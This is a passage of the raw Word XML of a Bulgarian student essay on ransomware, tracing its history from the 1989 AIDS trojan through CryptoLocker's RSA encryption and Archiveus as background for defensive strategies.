      <w:r w:rsidR="00A46E29">
        <w:t xml:space="preserve">омпаниите </w:t>
      </w:r>
      <w:r>
        <w:t>трябва</w:t>
      </w:r>
      <w:r w:rsidR="00A46E29">
        <w:t xml:space="preserve"> да </w:t>
      </w:r>
      <w:r>
        <w:t>провеждат з</w:t>
      </w:r>
      <w:r w:rsidR="00A46E29">
        <w:t>адължителни обучени</w:t>
      </w:r>
      <w:r>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidR="00A46E29">
        <w:t xml:space="preserve"> на служителите си, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">тъй като </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ra</w:t>
      </w:r>
      <w:r w:rsidR="00A46E29">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nsomware</w:t>
      </w:r>
      <w:r w:rsidR="00A46E29">
        <w:t xml:space="preserve"> може да бъде свален през имейл, </w:t>
      </w:r>
      <w:r w:rsidR="00A82944">
        <w:t>прикачени файлове</w:t>
      </w:r>
      <w:r w:rsidR="00A46E29">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A46E29">
        <w:t xml:space="preserve"> реклами, линкове, уеб страници с вложени злокачествени софтуери. В </w:t>
      </w:r>
      <w:r w:rsidR="00A46E29" w:rsidRPr="00563871">
        <w:t>реферата</w:t>
      </w:r>
      <w:r w:rsidR="00A46E29">
        <w:t xml:space="preserve">, ще бъдат разгледани стратегии и защити от </w:t>
      </w:r>
      <w:r w:rsidR="00A46E29">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ransomware.</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:id w:val="1603299047"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00C06BE8">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C06BE8">
            <w:instrText xml:space="preserve"> CITATION Sto \l 1026 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C06BE8">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r w:rsidR="00C06BE8">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:id w:val="758795052"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="001A4310">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001A4310">
            <w:instrText xml:space="preserve"> CITATION Ran \l 1026 </w:instrText>
          </w:r>
          <w:r w:rsidR="001A4310">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[2]</w:t>
          </w:r>
          <w:r w:rsidR="001A4310">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="004E706C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A91267" w14:textId="61AE46E5" w:rsidR="00BB2B78" w:rsidRDefault="000C1E67" w:rsidP="000C1E67">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc224154927"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">История на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ransomware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="03993B26" w14:textId="1105B80F" w:rsidR="0060119F" w:rsidRPr="00BB54BC" w:rsidRDefault="0060119F" w:rsidP="00051862">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BB54BC" w:rsidRPr="00BB54BC">
        <w:t>Ransomware може да изглежда като съвременна заплаха, но идеята за кражба на данни, ограничаване на достъпа и искане на откуп съществува от десетилетия.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A09A75" w14:textId="7378312F" w:rsidR="0060119F" w:rsidRDefault="0060119F" w:rsidP="00051862">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">В края на 80-те години, </w:t>
      </w:r>
      <w:r w:rsidR="00A82944">
        <w:t>кибер</w:t>
      </w:r>
      <w:r>
        <w:t>престъпниците са криптира</w:t>
      </w:r>
      <w:r w:rsidR="00A82944">
        <w:t>ли</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> файлове и са искали </w:t>
      </w:r>
      <w:r w:rsidR="00A82944">
        <w:t xml:space="preserve">откуп в долари, </w:t>
      </w:r>
      <w:r>
        <w:t>изпратен</w:t>
      </w:r>
      <w:r w:rsidR="00A82944">
        <w:t>и</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A82944">
        <w:t>по</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пощ</w:t>
      </w:r>
      <w:r w:rsidR="00A82944">
        <w:t xml:space="preserve">ата. </w:t>
      </w:r>
      <w:r>
        <w:t>Една от първите документирани</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ransomware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> атаки е: “</w:t>
      </w:r>
      <w:r w:rsidRPr="0060119F">
        <w:t xml:space="preserve">AIDS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0060119F">
        <w:t>trojan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0060119F">
        <w:t xml:space="preserve"> (PC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0060119F">
        <w:t>Cyborg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0060119F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0060119F">
        <w:t>Virus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0060119F">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A82944">
        <w:t>Троянският кон е раз</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">пространяван чрез флопи дискети през 1989 година. Потърпевшите са </w:t>
      </w:r>
      <w:r w:rsidR="00A82944">
        <w:t>принудени д</w:t>
      </w:r>
      <w:r>
        <w:t>а изпратят 189$ през пощенска кутия в Панама, за да възстановят достъпа до системите си</w:t>
      </w:r>
      <w:r w:rsidR="00195EC0">
        <w:t>. М</w:t>
      </w:r>
      <w:r>
        <w:t>етодът за криптиран</w:t>
      </w:r>
      <w:r w:rsidR="00195EC0">
        <w:t>е</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> е бил сравнително прост – чрез симетрично криптиране. Симетричното криптиране  е техника, </w:t>
      </w:r>
      <w:r w:rsidR="00195EC0">
        <w:t>при която</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> един и същи ключ се използва за криптиране и декриптиране на данните. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F76947" w14:textId="1317B6DC" w:rsidR="0047015F" w:rsidRDefault="0060119F" w:rsidP="00051862">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ransomware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> става широко разпространен </w:t>
      </w:r>
      <w:r w:rsidR="00195EC0">
        <w:t>от 2000 г.</w:t>
      </w:r>
      <w:r w:rsidR="00F63133">
        <w:t xml:space="preserve"> и продължава да бъде актуален </w:t>
      </w:r>
      <w:r w:rsidR="00195EC0">
        <w:t xml:space="preserve">до настоящия момент. Преди 2000 г. киберпрестъпниците са имали затруднения при получаването на откуп. </w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:t xml:space="preserve">Появата на биткойна и криптовалутите променят това. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA9143D" w14:textId="37114C03" w:rsidR="0060119F" w:rsidRDefault="00195EC0" w:rsidP="0047015F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Криптовалутите са л</w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:t>есен и удобен начин за получаване на сума</w:t>
      </w:r>
      <w:r w:rsidR="00F516C1">
        <w:t>та</w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:t xml:space="preserve"> от потърпевшия</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006359D0">
        <w:t xml:space="preserve">защото </w:t>
      </w:r>
      <w:r>
        <w:t>са трудно проследими.</w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:t xml:space="preserve"> При традиционното банкиране участниците са ясно идентифицирани – име, банка, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">сметки, наличности, </w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:t>държава, регулации и т.н. При криптовалутите адрес</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ът на получателя </w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:t xml:space="preserve">на сметката не съдържа директна лична информация. Липсва и централизиран контролен орган. </w:t>
      </w:r>
      <w:r>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:t>очти невъзможн</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">о е преводите </w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:t xml:space="preserve">да бъдат спрени, замразени, върнати или проследени от институциите.  </w:t>
      </w:r>
      <w:r w:rsidR="00624808">
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:t>Изпирането</w:t>
      </w:r>
      <w:r w:rsidR="00624808">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:t xml:space="preserve"> на валутата е сравнително лесно – чрез т.нар. </w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chain hopping (</w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:t xml:space="preserve">прехвърляне между различни криптовалути) и използване на </w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>privacy coins.</w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00624808">
        <w:t>Отрицателната страна</w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:t xml:space="preserve"> на биткойна е</w:t>
      </w:r>
      <w:r w:rsidR="00624808">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:t xml:space="preserve"> че не вс</w:t>
      </w:r>
      <w:r w:rsidR="00624808">
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidR="00624808">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00624808">
        <w:t>потърпевш</w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:t xml:space="preserve"> е достатъчно запознат как да го предостави</w:t>
      </w:r>
      <w:r w:rsidR="00624808">
        <w:t xml:space="preserve">, за да си върне информацията. </w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:t xml:space="preserve">Някои от </w:t>
      </w:r>
      <w:r w:rsidR="00624808">
        <w:t>компютърните престъпници</w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:t xml:space="preserve"> са </w:t>
      </w:r>
      <w:r w:rsidR="00624808">
        <w:t xml:space="preserve">разкрити и </w:t>
      </w:r>
      <w:r w:rsidR="007C63A0">
        <w:t xml:space="preserve">заловени, </w:t>
      </w:r>
      <w:r w:rsidR="00624808">
        <w:t>защото са провеждали</w:t>
      </w:r>
      <w:r w:rsidR="00097ECD">
        <w:t xml:space="preserve"> видеоконференции, </w:t>
      </w:r>
      <w:r w:rsidR="00624808">
        <w:t>на които са показвали</w:t>
      </w:r>
      <w:r w:rsidR="006359D0">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00624808">
        <w:t xml:space="preserve"> на засегнатите как </w:t>
      </w:r>
      <w:r w:rsidR="00097ECD">
        <w:t xml:space="preserve">да </w:t>
      </w:r>
      <w:r w:rsidR="00624808">
        <w:t>предоставят биткойна</w:t>
      </w:r>
      <w:r w:rsidR="00097ECD">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CEA244" w14:textId="1C64B3CD" w:rsidR="0037494B" w:rsidRDefault="00097ECD" w:rsidP="00051862">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00097ECD">
        <w:t xml:space="preserve">През 2013 г. се появява </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00051862">
        <w:t>CryptoLocker</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00097ECD">
        <w:t xml:space="preserve">, което бележи повратен момент в развитието на ransomware. Този нов вид изнудващ зловреден софтуер използва плащания чрез </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00097ECD">
        <w:t>Bitcoin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00097ECD">
        <w:t xml:space="preserve"> и прилага по-съвременни криптографски методи.</w:t>
      </w:r>
      <w:r w:rsidR="00BB54BC" w:rsidRPr="00BB54BC">
        <w:t xml:space="preserve"> За целта са прилагани 2048-bit RSA двойк</w:t>
      </w:r>
      <w:r w:rsidR="00BB54BC">
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidR="00BB54BC" w:rsidRPr="00BB54BC">
        <w:t xml:space="preserve"> ключове – генерирани от командно-контролен сървър и изпращани към пострадалия.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB54BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:id w:val="1977027603"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00C06BE8" w:rsidRPr="00BB54BC">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C06BE8" w:rsidRPr="00BB54BC">
            <w:instrText xml:space="preserve"> CITATION Kur22 \l 1026 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C06BE8" w:rsidRPr="00BB54BC">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[3]</w:t>
          </w:r>
          <w:r w:rsidR="00C06BE8" w:rsidRPr="00BB54BC">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="21459665" w14:textId="77777777" w:rsidR="00743616" w:rsidRPr="00743616" w:rsidRDefault="00743616" w:rsidP="00051862">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="346A1C55" w14:textId="34AD3BBD" w:rsidR="005C0285" w:rsidRDefault="00D35C6E" w:rsidP="00D35C6E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc224154928"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Еволюция на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ransom</w:t>
      </w:r>
      <w:r w:rsidR="00EA2C3E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="32DD2FEF" w14:textId="3BF1F9AC" w:rsidR="00E31DE8" w:rsidRPr="00E31DE8" w:rsidRDefault="00E31DE8" w:rsidP="003E4D90">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc224154929"/>
      <w:r>
        <w:t xml:space="preserve">Ранна фаза на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ransomware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="5B886B29" w14:textId="7738D7EA" w:rsidR="00EA2C3E" w:rsidRPr="006649B6" w:rsidRDefault="00F370B2" w:rsidP="0051454C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Първичната форма на софтуера за изнудване е</w:t>
      </w:r>
      <w:r w:rsidR="00616A98">
        <w:t xml:space="preserve"> чрез</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> инфектирани флопи</w:t>
      </w:r>
      <w:r w:rsidR="009C6F73">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>дискове</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">На фигура </w:t>
      </w:r>
      <w:r w:rsidR="00366161">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> е показано съобщението, което се визуализира на системата</w:t>
      </w:r>
      <w:r w:rsidR="009C6F73">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> афектирана от троянския кон - </w:t>
      </w:r>
      <w:r w:rsidRPr="0060119F">
        <w:t xml:space="preserve">AIDS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0060119F">
        <w:t>trojan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0060119F">
        <w:t xml:space="preserve"> (PC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0060119F">
        <w:t>Cyborg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0060119F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0060119F">
        <w:t>Virus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0060119F">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AIDS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> заменя </w:t>
      </w:r>
      <w:r w:rsidRPr="00F370B2">
        <w:t>AUTOEXEC.BAT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>файла, който по-късно се използва да преброи колко пъти компютър</w:t>
      </w:r>
      <w:r w:rsidR="009C6F73">
        <w:t>ът</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> е стартиран. Когато </w:t>
      </w:r>
      <w:r w:rsidR="009C6F73">
        <w:t>броячът до</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">стигне до 90, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AIDS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> скрива всички директории и криптира имената на всички файлове</w:t>
      </w:r>
      <w:r w:rsidR="009C6F73">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> намиращи се на </w:t>
      </w:r>
      <w:r w:rsidRPr="00E31DE8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:</w:t>
      </w:r>
      <w:r w:rsidR="009C6F73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009C6F73" w:rsidRPr="009C6F73">
        <w:t>драйв</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="006649B6">
        <w:t xml:space="preserve">Съответно се появява </w:t>
      </w:r>
      <w:r w:rsidR="00F10E75">
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidR="006649B6">
        <w:t>съобщението за откуп.</w:t>
      </w:r>
      <w:r w:rsidR="00C06BE8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="147718911"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00C06BE8">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00C06BE8">
            <w:instrText xml:space="preserve"> CITATION Kur22 \l 1026 </w:instrText>
          </w:r>
          <w:r w:rsidR="00C06BE8">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[3]</w:t>
          </w:r>
          <w:r w:rsidR="00C06BE8">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="25537DDA" w14:textId="77777777" w:rsidR="008874DA" w:rsidRDefault="00F370B2" w:rsidP="008874DA">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="039D1F71" wp14:editId="27E507B6">
            <wp:extent cx="5760720" cy="2816225"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1163389886" name="Pictur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3B1E" w14:textId="4874888D" w:rsidR="00461FCA" w:rsidRPr="008874DA" w:rsidRDefault="008874DA" w:rsidP="008874DA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc223382607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</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="008874DA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidRPr="00366161">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ъобщение за откуп на </w:t>
      </w:r>
      <w:r w:rsidRPr="00366161">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AIDS trojan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidR="00461FCA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACC4CC9" w14:textId="1A719B4B" w:rsidR="00461FCA" w:rsidRPr="003E4D90" w:rsidRDefault="00461FCA" w:rsidP="003E4D90">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc224154930"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ransomware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> използващ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RSA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> криптиране</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="26378CCA" w14:textId="5F037F9C" w:rsidR="00E31DE8" w:rsidRDefault="00E31DE8" w:rsidP="00A46A8E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">През 2004-2005 г. се появява нова форма на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ransomware.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Към вирусите се прилагат по-силни криптиращи алгоритми. </w:t>
      </w:r>
      <w:r w:rsidR="00EF20BE">
        <w:t>„</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Archiveus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trojan</w:t>
      </w:r>
      <w:r w:rsidR="00EF20BE">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> е първият вирус</w:t>
      </w:r>
      <w:r w:rsidR="009C6F73">
        <w:t xml:space="preserve">, който </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">използва асиметричен алгоритъм за криптиране на данни – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RSA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (фиг. </w:t>
      </w:r>
      <w:r w:rsidR="009C6F73">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
